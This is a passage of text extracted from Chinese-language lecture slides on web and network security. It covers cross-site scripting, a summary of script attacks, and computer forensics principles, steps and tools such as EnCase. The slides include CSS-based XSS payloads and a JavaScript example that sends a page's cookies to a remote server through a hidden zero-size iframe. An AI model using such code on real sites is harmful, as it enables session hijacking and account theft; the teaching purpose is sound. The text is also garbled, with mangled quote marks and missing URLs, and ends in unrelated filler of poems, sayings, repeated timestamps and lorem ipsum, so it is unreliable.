【正文】 groundimage: url(javascript:alert(39。XSS39。))。} body {backgroundimage: expression(alert(XSS))。} 跨站腳本危害范例 Cookies竊取 93 Web服務(wù)器 URL 大小為 0的 iframe 將字符編碼傳送 var code。 var target = info=escape()。 target=target+info。 code=iframe style=39。display:none。39。 src=。 code=code+target。 code=code+ width=0 height=0/iframe。 (code)。 跨站腳本危害 竊取 Cookies ?更改 Cookies成功獲取身份 94 總結(jié) ?腳本攻擊從本質(zhì)上是一種過濾不足造成的攻擊 ?腳本是不需要編譯的程序代碼，依賴腳本引擎來解釋執(zhí)行，具有很好的操作系統(tǒng)適應(yīng)性和可移植性 ?如果不可信的內(nèi)容被引入到動態(tài)頁面中，則無論是網(wǎng)站還是客戶機都沒有足夠的信息識別這種情況的發(fā)生并采取保護措施 ?腳本攻擊方法主要包括： SQL注入攻擊、跨站腳本攻擊等 95 計算機取證 ?計算機取證概念 ?計算機取證遵循原則 ?計算機取證步驟 ?計算機取證技術(shù)和工具 96 計算機取證的概念 ?什么是計算機取證 ? 計算機取證是使用軟件和工具，按照一些預(yù)先定義的程序全面地檢查計算機系統(tǒng)，以提取和保護有關(guān)計算機犯罪的證據(jù)。 ?為什么需要取證 ? 通過證據(jù)查找肇事者 ? 通過證據(jù)推斷犯罪過程 ? 通過證據(jù)判斷受害者損失程度 ? 收集證據(jù)提供法律支持 97 計算機取證的原則 ?合法原則 ? 取證必須符合相關(guān)法律法規(guī) ?充分授權(quán)原則 ? 取證必須得到充分授權(quán) ?優(yōu)先保護證據(jù)原則 ? 取證可能導(dǎo)致證據(jù)破壞，必須優(yōu)先考慮保護證據(jù) ?全程監(jiān)督原則 ? 整個取證過程應(yīng)全程第三方監(jiān)督 98 計算機取證的步驟 99 準備 保護 提取 分析 提交 計算機取證 準備 ?獲取授權(quán) ? 取證工作獲得明確的授權(quán)（授權(quán)書） ?目標明確 ? 對取證的目的有清晰的認識 ?工具準備 ? 對取證環(huán)境的了解及需要準備的工具 ?軟件準備 ? 對取證的軟件進行過有效的驗證 ?介質(zhì)準備 ? 確保有符合要求的干凈的介質(zhì)可用于取證 100 計算機取證 保護 ?保證數(shù)據(jù)安全性 ? 制作磁盤映像 不在原始磁盤上操作 ?保證數(shù)據(jù)完整性 ? 取證中不使用可能破壞完整性的操作 ?第三方監(jiān)督 ? 所有操作都有第三方在場監(jiān)督 101 計算機取證 提取 102 ?優(yōu)先分析易消失的證據(jù) ? 內(nèi)存信息、系統(tǒng)進程、網(wǎng)絡(luò)連接信息、路由信息、臨時文件、緩存 ?文件系統(tǒng) ? 數(shù)據(jù)恢復(fù)、隱藏文件、加密文件、系統(tǒng)日志 ?應(yīng)用系統(tǒng) ? 系統(tǒng)日志 計算機取證 分析及提交 ?證據(jù)在什么地方？ ? 日志、刪除的文件、臨時文件、緩存 ?從證據(jù)中能發(fā)現(xiàn)什么？ ?如何關(guān)聯(lián)證據(jù)？ ?電子取證提交 ? 必須與現(xiàn)實取證結(jié)合，文檔化很重要 103 計算機取證工具 ?開放源代碼軟件 ? Coroners工具包，它是計算機犯罪取證檢查的一些工具軟件的集合。 ?商業(yè)軟件取證軟件 ? Encase—— 基于 Windows平臺，提供從數(shù)據(jù)發(fā)現(xiàn)到分析到生成報表的全面的解決方案； AccessData，用于獲取口令的軟件；以及 ThumbsPlus，Snapback… ? Net Threat Analyzer： NTI公司的軟件系統(tǒng) 104 謝謝，請?zhí)釂栴}！ 靜夜四無鄰，荒居舊業(yè)貧。 , January 23, 2023 雨中黃葉樹，燈下白頭人。 20:29:1720:29:1720:291/23/2023 8:29:17 PM 1以我獨沈久，愧君相見頻。 :29:1720:29Jan2323Jan23 1故人江海別，幾度隔山川。 20:29:1720:29:1720:29Monday, January 23, 2023 1乍見翻疑夢，相悲各問年。 :29:1720:29:17January 23, 2023 1他鄉(xiāng)生白發(fā)，舊國見青山。 2023年 1月 23日星期一 下午 8時 29分 17秒 20:29: 1比不了得就不比，得不到的就不要。 2023年 1月 下午 8時 29分 :29January 23, 2023 1行動出成果，工作出財富。 2023年 1月 23日星期一 8時 29分 17秒 20:29:1723 January 2023 1做前，能夠環(huán)視四周；做時，你只能或者最好沿著以腳為起點的射線向前。 下午 8時 29分 17秒 下午 8時 29分 20:29: 沒有失敗，只有暫時停止成功！。 , January 23, 2023 很多事情努力了未必有結(jié)果，但是不努力卻什么改變也沒有。 20:29:1720:29:1720:291/23/2023 8:29:17 PM 1成功就是日復(fù)一日那一點點小小努力的積累。 :29:1720:29Jan2323Jan23 1世間成事，不求其絕對圓滿，留一份不足，可得無限完美。 20:29:1720:29:1720:29Monday, January 23, 2023 1不知香積寺，數(shù)里入云峰。 :29:1720:29:17January 23, 2023 1意志堅強的人能把世界放在手中像泥塊一樣任意揉捏。 2023年 1月 23日星期一 下午 8時 29分 17秒 20:29: 1楚塞三湘接，荊門九派通。 2023年 1月 下午 8時 29分 :29January 23, 2023 1少年十五二十時，步行奪得胡馬騎。 2023年 1月 23日星期一 8時 29分 17秒 20:29:1723 January 2023 1空山新雨后，天氣晚來秋。 下午 8時 29分 17秒 下午 8時 29分 20:29: 楊柳散和風(fēng)，青山澹吾慮。 , January 23, 2023 閱讀一切好書如同和過去最杰出的人談話。 20:29:1720:29:1720:291/23/2023 8:29:17 PM 1越是沒有本領(lǐng)的就越加自命不凡。 :29:1720:29Jan2323Jan23 1越是無能的人，越喜歡挑剔別人的錯兒。 20:29:1720:29:1720:29Monday, January 23, 2023 1知人者智，自知者明。勝人者有力，自勝者強。 :29:1720:29:17January 23, 2023 1意志堅強的人能把世界放在手中像泥塊一樣任意揉捏。 2023年 1月 23日星期一 下午 8時 29分 17秒 20:29: 1最具挑戰(zhàn)性的挑戰(zhàn)莫過于提升自我。 2023年 1月 下午 8時 29分 :29January 23, 2023 1業(yè)余生活要有意義，不要越軌。 2023年 1月 23日星期一 8時 29分 17秒 20:29:1723 January 2023 1一個人即使已登上頂峰，也仍要自強不息。 下午 8時 29分 17秒 下午 8時 29分 20:29: MOMODA POWERPOINT Lorem ipsum dolor sit, eleifend nulla ac, fringilla purus. Nulla iaculis tempor felis amet, consectetur adipiscing elit. Fusce id urna blanditut cursus. 感謝您的下載觀看 專家告訴